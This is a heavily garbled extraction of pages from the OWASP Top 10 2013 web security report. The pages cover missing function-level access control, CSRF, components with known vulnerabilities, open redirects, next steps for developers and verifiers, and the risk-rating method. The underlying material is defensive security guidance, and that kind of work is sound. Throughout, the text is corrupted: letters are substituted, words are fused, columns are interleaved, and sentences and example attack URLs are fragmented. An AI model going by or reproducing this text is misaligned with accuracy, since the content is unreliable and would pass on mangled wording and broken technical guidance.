onymousrs accessvatectionality orular users a

vilegedctionT

Attacker, whois an authori&edsystem user,simply changesthe J(8 or aparameter to a

privilegedfunction. IsaccessgrantedTAnonymoususerscould accessprivatefunctions thataren-tprotected.

Applications do not alwaysprotect application functionsproperly. ometimes, functionlevel protection is managed viaconfiguration, and the system ismisconfigured. ometimes,

developers must include theproper code checks, and theyforget.

+etecting such Caws is easy. "hehardest part is identifying whichpages 5J(8s6 or functions existto attack.

uch Cawsallow attackersto accessunauthori&edfunctionality.Administrative

functions arekey targets forthis type ofattack.

*onsider thebusiness valuof the exposefunctions andthe data theyprocess.

Also considerthe impact toyourreputation ifthisvulnerabilitybecamepublic.

m I ulnerable to

orced Access+e best way to find out if an applications failed to properly restrict function levelcess is to verify e$ery applicationnction9

ow Do I Pre$ent

Forced Access+our application should have a consistent aeasy to analy&e authori&ation module that invoked from all of your business functionre2uently, such protection is provided by one o

A

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

23/39

+oes the JI show navigation to unauthori&ed more components externa to t e app cat on

Are server side authentication orauthori&ation checks missingT

#."hink about the process for managingentitlements and

Are server side checks done that solely rely on . information provided by the attackerT default, re2uiring explicit grants to specific

ing a proxy, browse your application with avileged role.en revisit restricted pages using a lessvileged role. If therver responses are alike, youXre probablylnerable. omesting proxies directly support this type of

alysis.u can also check the access controlplementation in the code. "ry following agle privileged re2uest through the code andrifying the authori&ation pattern. "hen searche codebase to find where that pattern is noting followed.tomated tools are unlikely to find theseoblems.

:ample Attac# Scenariose n ario U # 9 "he attacker simply force browses

target(8s. "he following J(8s re2uire authentication.min rightse also re2uired for access to thedminYgetappInfoG page.

t tp > e:a mp lec om a p p g eta p p I

&o

t tp > e:a mp lec om a p p a dm in Ug

ta p p In&o

an unauthenticated user can access eitherge, that-s a flaw. If an authenticated, non3min, user is allowed to access the

dminYgetappInfoG page, this is also a flaw, andayad the attacker to more improperly protectedmin pages.

e n ario U 9 A page provides an Vactionarameter to specify the function being invoked,d dierent actions re2uire dierent roles. Ifese roles aren-t enforced, that-s a flaw.

access to every function.

/. If the function is involved in a workflow,check to make sure the conditions are in theproper state to allow access.

EO")9 'ost web applications don-t display linksand buttons to unauthori&ed functions, but this

Dpresentation layer access controlG doesn-tactually provide protection. ou must als oimplement checks in the controller or businesslogic.

'e&erencesOWASP

OWA! " op # $ 3$$1 on ailu re t o (e s trict J (8Acc ess

) A ! I Ac c ess * o n t r o l A !I

OWA! + eve lo p me n t < u id e 9 *h ap ter o n

A u t h ori& a tion OWA! "es tin g < u id e 9 "es tin g f or ! a th " ra ve r sa

OWA! Article o n o rc e d ;row s ing

or additional access control re2uirements, seethe AFre2u irements area for Access *on trol 5F06.

9:ternal

*W) ) n try B on Impr op e r Acc es s *o n tr o l5A u t h ori& a tion6

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

24/39

Cross2Site 'e

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

25/39

he victim visits any of the attacker-s sitesile already authenticated to example.com,

ese forged re2uests will automatically includee user-s session info, authori&ing theacker-s re2uest.

'e&erencesOWASP

OWA! * ( Article

OWA! * ( !re ve n tio n *heat h eet

OWA! * ( < u ard 3 * ( + efe n s e " oo l

) A!I !r o %e c t H o m e ! age

) A!I H "" !Jtilities * lass w ith A n ti* ( " oke ns

OWA! "es tin g < u id e 9 *h ap ter on * ( "es ting

OWA! * ( " es ter 3*("esting"ool

9:ternal

*W) ) n try /B on * (

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

26/39

%sing Componentswith @nownulnerabilities

"hreatAgents

Attac#

ectors

SecurityWea#ness

"echnic

alImpacts

0usinessImpacts

plication Speci&icploitability

A9'AE9

Pre$alence

WID9SP'9AD

Detectability

DIFFIC%L"

Impact

1OD9'A"9

Application 0usinesSpeci&ic

menerable

mponentsg., frameworkaries6 can be

ntifiedd exploitedhomatedls,

panding theeat agentol beyondgetedackers toude chaoticors.

Attackeridentifies aweakcomponentthroughscanning or

manualanalysis. Hecustomi&es theexploit asneeded andexecutes theattack. It getsmore diicult ifthe usedcomponent isdeep in theapplication.

Firtually every application hasthese issues because mostdevelopment teams don-t focuson ensuring theircomponents:libraries are up todate. In many cases, the

developers don-t even know allthe components they are using,never mind their versions.*omponent dependencies makethings even worse.

"he full rangeof weaknessesis possible,includingin%ection,broken access

control, Q,etc. "he impactcould rangefrom minimal tocomplete hosttakeover anddatacompromise.

*onsider whaeachvulnerabilitymight mean fthe businesscontrolled by

the aectedapplication. Itcould be triviaor it could mecompletecompromise.

m I ulnerable to @nown

ulns+theory, it ought to be easy to figure out if youe currently using any vulnerable componentslibraries. Jnfortunately, vulnerability reportscommercial or open source software do not

ways specify exactly which versions of amponent are vulnerable in a standard,archable way. urther, not all libraries use anderstandable version numbering system.orst of all, not all vulnerabilities are reported tocentral clearinghouse thatis easy to search,hough sites like * F) and E F+ are becomingsier to search.

termining if you are vulnerable re2uiresarching these databases, as well as keepingreast of pro%ect mailing lists andnouncements for anything that might be alnerability. If one of your components doesve a vulnerability, you should carefullyaluate whether you are actually vulnerable byecking to see if your code uses thert of the component with the vulnerability andether thew could result in an impact you care about.

ow Do I Pre$ent "his+One option is not to use components that youdidn-t write. ;ut that-s not very realistic.

'ost component pro%ects do not createvulnerability patches for old versions. Instead,most simply fix the problem in the next version.o upgrading to these new versions is critical.oftware pro%ects should have a process in placeto9#6 Identify all components and the versions

you are using, including all dependencies.5e.g., the ve r s io n s plugin6.

6 'onitor the security of these components ipublic databases, pro%ect mailing lists, andsecurity mailing lists, and keep them up todate.

/6 )stablish security policies governingcomponent use, suchas re2uiring certainsoftware development practices,passingsecurity tests, and acceptable licenses.

06 Where appropriate, consider adding securitwrappers around components to disableunused functionality and: or secure weak orvulnerable aspects of the component.

:ample Attac# Scenariosmponent vulnerabilities can cause almost any

pe of risk imaginable, ranging from the trivialsophisticated malware designed to target a

ecific organi&ation. *omponents almostalwaysn with the full privilege of the application, sows in a n y component can be serious, "helowing twolnerable components were downloaded m

mes in $##.

A p ac h e *Q A u t h e n tica t ion ;y p ass ? ;y failto provide an identity token, attackers coinvoke any web service with full permissi5Apache *Q is a services framework, notbe confused with the Apache Applicaterver.6

pring ( em ote * o d e ) x e cution ? Abuse of th)xpression 8anguage implementation inpring allowed attackers to execute arbitrarcode, eectively taking over the server.

A

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

27/39

ery application using either of these vulnerableraries is vulnerable to attack as both of thesemponents are directly accessible by applicationers. Other vulnerable libraries, used deeper inapplication, may be harder to exploit.

'e&erencesOWASP

OWA! + e p e nd e n cy *he c k 5 fora v a lib r aries6

OWA! af e Eu

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

28/39

ow Do I Pre$ent "his+e use of redirects and forwards can be donenumber of ways9

imply avoid using redirects and forwards.

If used, don-t involve user parameters inulating thedestination. "his can usually be done.

If destination parameters can-t be avoided,ure thatthe supplied value is $alid, and authoriTed

for the user.

It is recommended that any such destinationparameters be a mapping value, rather thanthe actual J(8 or portionof the J(8, and thaserver side code translate this mapping tothe target J(8.

Applications can use )A!I to override these nd ( e d ir ect56method to make sure all redirect destinationare safe.

Avoiding such Caws is extremely important as thare afavorite target of phishers trying to gain the usetrust.

:ample Attac# Scenariose n ario U # 9 "he application has a page callededirect.%spG which takes a single parametermed DurlG. "he attacker crafts a malicious

(8 that redirects users to a malicious site thatrforms phishing and installs malware.

t tp > w w we:a mp lec omr e d ir e ct/sp+rlGe$ilcom

e n ario U 9 "he application uses forwards toute re2uests between dierent parts of the

e. "o facilitate this, some pages use arameter to indicate where the user should bent if a transaction is successful. In this case,e attacker crafts a J(8 that will pass theplication-s access control check and thenwards the attacker to administrative

nctionality for which the attacker isn-tthori&ed.

t tp > w w we:a mp lec ombor in g /sp+wdGadmin/sp

'e&erencesOWASP

OWA! Article o n Op e n (edir ects

) A!I e c u rit y Wr app e r( es p o n s e se nd ( e d ir e ctme t h od

9:ternal

*W) ) n try @$# on O p e n (edir ects WA* Article o n J (8 ( e d ir e ct o r A bu se

< oogle b log article o n t h e d a n g e rs of o p e nr e d ir ects

OWA! " op #$ for .E) " a rticle o n J n v alid a t e d( e d ir e cts a ndorwards

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

29/39

KD Whats (e:t &orDe$elopers

stablish V %se 'epeatable Security Processes andtandard Security Controls

hether you are new to web application security or are already very familiar with these risks, the taskproducing a secure web application or fixing an existing one can be diicult. If you have to managege application portfolio, this can be daunting.

help organi&ations and developers reduce their application security risks in a cost eective manner

WA! has produced numerous fr e e a n d o p e n resources that you can use to address applicationcurity in your organi&ation. "he following are some of the many resources OWA! has produced tolp organi&ations produce secure web applications. On the next page, we present additional OWA!sources that can assist organi&ations in verifying the security of their applications.

Application Security'e

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

30/39

ere are numerous additional OWA! resources available for your use. !lease visit the OW A !o%e c ts p age, which lists all of the OWA! pro%ects, organi&ed by the release 2uality of the pro%ects inestion 5(elease Puality, ;eta, or Alpha6. 'ost OWA! resources are available on our w iki, and many

WA! documents can be ordered in h ar d co p y or as e ;ook s.

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

31/39

K Whats (e:t &oreri&iers

et OrganiTed

verify the security of a web application you have developed, or one you are considering purchasingWA! recommends that you review the application-s code 5if available6, and test the application as

ll. OWA! recommends a combination of secure code review and application penetration testingenever possible, as that allows you to leverage the strengths of both techni2ues, and the twoproaches complement each other. "ools for assisting the verification process can improve theiciencyand eectiveness of an expert analyst. OWA!-s assessment tools are focused on helping anpert become more eective, rather than trying to automate the analysis process itself.

andardi&ing How ou Ferify Web Application ecurity9 "o help organi&ations develop consistencyd a defined level of rigor when assessing the security of web applications, OWA! has producede OWA! A pp lica t ion e c u rity Ferificatio n t a nd ard 5A F 6. "his document defines a minimumrification standard for performing web application security assessments. OWA! recommends thatu use the AF as guidance for not only what to look for when verifying the security of a webplication, but also which techni2ues are most appropriate to use, and to help you define and selectevel of rigor when verifying the security of a web application. OWA! also recommends you usee AF to help define and select any web application assessment services you might procure fromhird party provider.

sessment "ools uite9 "he OWA! 8iv e *+ !r o %e c t has pulled together some of the best open sourcecurity tools into a single bootable environment or virtual machine 5F'6. Web developers, testers, ancurity professionals can boot from this 8ive *+,run the F', and immediately have access to a full security testing suite. Eo installation ornfiguration is re2uired to use the tools provided on this *+.

ode 'e$iew

cure code review is particularly suited torifying that an application contains strongcurity mechanisms as well as finding issuesat are hard to identify by examining the

plication-s output. "esting is particularly suitedproving that flaws are actually exploitable.at said, the approaches are complementaryd in fact overlap in some areas.

viewing the *ode9 As a companion to theWA!evelop er-s

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

32/39

ecurity and Penetrationesting

ting the Application9 OWA! produced thetin g < u ide to help developers, testers, andlication security specialists understand how tociently and eectively test the security of weblications. "his enormous guide, which hadens of contributors, provides wide coverage

many web application security testing topics.as code reviewits strengths, so does security testing. It-s

y compelling when you can prove that anlication is insecure by demonstrating theloit. "here are also many security issues,ticularly all the security provided by the

application infrastructure, that simply cannotbe seen by a code review, since the applicationis not providing all of the security itself.

Application !enetration "esting "ools9Webcara b, which wasone of the most widelyused of all OWA! pro%ects, and the new ZA !,which now is far more popular, are both webapplication testing proxies. uch tools allowsecurity analysts and developers to interceptweb application re2uests, so theycan figure ou

how the application works, and then submit tesre2uests to see if the application respondssecurely to such re2uests. "hese tools areparticularly eective at assisting in identifyingQ flaws, Authentication flaws, and Access*ontrol flaws. ZA! even has anac t ive s ca nn e rbuilt in, and best of all it-s ())=

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

33/39

KO Whats (e:t &orOrganiTations

tart our Application Security Program (ow

plication security is no longer optional. ;etween increasing attacks and regulatory pressures,gani&ations must establish an eective capability for securing their applications.

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

34/39

anagethetrics.veprovemt andnding

decisions based on the metrics and analysis data captured. 'etrics includeadherence to security practices : activities, vulnerabilities introduced,vulnerabilities mitigated, application coverage, defect density by type andinstance counts, etc.

[Analy&e data from the implementation and verification activities to lookfor root cause and vulnerability patterns to drive strategic and systemicimprovements across the enterprise.

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

35/39

K' (ote About 'is#s

s About 'is#sR (ot Wea#nesses

hough the $$1 and earlier versions of the OWA! " op #$ focused on identifying the most commoulnerabilities,G the OWA! "op #$ has always been organi&ed around risks. "his has caused somederstandable confusion on the part of people searching for an airtight weakness taxonomy. "he

WA! " op #$ for $#$ clarified the risk3focus in the "op #$ by being very explicit about how threatents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risk"his version of the OWA! "op #$ follows the same methodology.

e (isk (ating methodology for the "op #$ is based on the OWA! (is k (a t in g 'et h o d olog y. or eacp #$ item, wetimated the typical risk that each weakness introduces to a typical web application by looking atmmon likelihood factors andpact factors for each common weakness. We then rank ordered the "op #$ according to those

aknesses that typicallyroduce the most signiLcant risk to an application.

e OWA! (is k (a t in g ' e t h o d ology defines numerous factors to help calculate the risk of anentified vulnerability. However, the "op #$ must talk about generalities, rather than specificlnerabilities in real applications. *onse2uently, we can never be as precise as system owners can been calculating risks for their application5s6. ou are best e2uipped to %udge the importance of yourplications and data, what your threat agents are, and how your system has been built and is beingerated.

r methodology includes three likelihood factors for each weakness 5prevalence, detectability, and

se of exploit6 and one impact factor 5technical impact6. "he prevalence of a weakness is a factor thau typically don-t have to calculate. or prevalence data, we have been supplied prevalence statisticsm a number of dierent organi&ations 5as referenced in the Acknowledgements section on page /6d we have averaged their data together to come up with a "op #$ likelihood of existence list byevalence. "his data was then combined with the other two likelihood factors 5detectability and easeexploit6 to calculate a likelihood rating for each weakness. "his was then multiplied by our estimateerage technical impact for each item to come up with an overall risk ranking for each item in the "o.

te that this approach does not take the likelihood of the threat agent into account. Eor does itcount for any of the various technical details associated with your particular application. Any of thectors could significantly affect the overall likelihood of an attacker finding and exploiting a particular

nerability. "his rating also does not take into account the actual impact on your business. o u rga n i& a tio n will have to decide how much security risk from applications t h e o rga n i& a tio n is willing toceptven your culture, industry, and regulatory environment. "he purpose of the OWA! "op #$ is not to ds risk analysis for you.

e following illustrates our calculation of the risk for A/9 *ross3ite cripting, as an example. Q is sevalent it warranted thely VF)( WI+)!()A+- prevalence value of $. All other risks ranged from widespread to uncommonalue # to /6.

"hreatAgents

Attac

#ectors

Securi

tyWea#ness

"echnic

alImpacts

0usiness

Impacts

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

36/39

App Speci&ic9:ploitability

Pre$alence

9'WID9SP'9AD

Detectability9AS

Impact

1OD9'A"9

)

App 0usiness

SpeciBc

)

) !

)

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

37/39

KF Details About 'is#Factors

op ! 'is# Factor Summary

e following table presents a summary of the $#/ "op #$ Application ecurity (isks, and the riskctors we have assigned to each risk. "hese factors were determined based on the availableatistics and the experience of the OWA! "op #$ team. "o understand these risks for a particularplication or organi&ation, y ou m u s t co n s id e r y o u r o w n s p e cific t h r e at a g e n ts a n d bu s in es s impac t s .en egregious software weaknesses may not present a serious risk if there are no threat agents in asition to perform the necessary attack or the business impact is negligible for the assets involved.

(IK

"hreatAgents

Attac#

ectors

9:ploitability

Security

Wea#ness

Pre$alenceDetectability

"echnical

Impacts

Impact

0usineImpac

dditional 'is#s to Consider

e "op #$ cover a lot of ground, but there are many other risks you should consider and evaluate inur organi&ation. ome of these have appeared in previous versions of the "op #$, and others havet, including new attack techni2ues that are being identified all the time. Other important applicatio

curity risks 5in alphabetical order6 that you should also consider include9* lick%a cking*on curren cy laws+en ial of ervice 5Was $$0 "op #$ ? )ntry $$03A6

In/ection App 9AS CO11O( A9'AE9 S99'9 App

App A9'AE9 WID9SP'9A A9'AE9 S99'9 App

3SS App A9'AE9 9' 9AS 1OD9'A"9 App

Insecure App 9AS CO11O( 9AS 1OD9'A"9 App

1iscon&ig App 9AS CO11O( 9AS 1OD9'A"9 App

Sens App DIFFIC%L" %(CO11O( A9'AE9 S99'9 App

Function App 9AS CO11O( A9'AE9 1OD9'A"9 App

CS'F App A9'AE9 CO11O( 9AS 1OD9'A"9 App

App A9'AE9 WID9SP'9A DIFFIC%L" 1OD9'A"9 App

!2 App A9'AE9 %(CO11O( 9AS 1OD9'A"9 App

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

38/39

) xp ression 8 an gu age In %ectio n 5*W) 3#16In format ion 8eakage and Improp er ) rro r H and ling 5Was part of $$1 "op #$ ? )n try $$13A@6In su icien t An ti 3au tomat ion 5*W)316Insuicient 8ogging and Accountability 5(elated to $$1 "op #$ ? )n try $$13A@68ack of Intru sion +etection an d (esp on se'aliciou s ile ) xecu tio n 5Was $$1 "op #$ ? )n try $$13A/6'ass Assignmen t 5*W)3#B6Jser !rivacy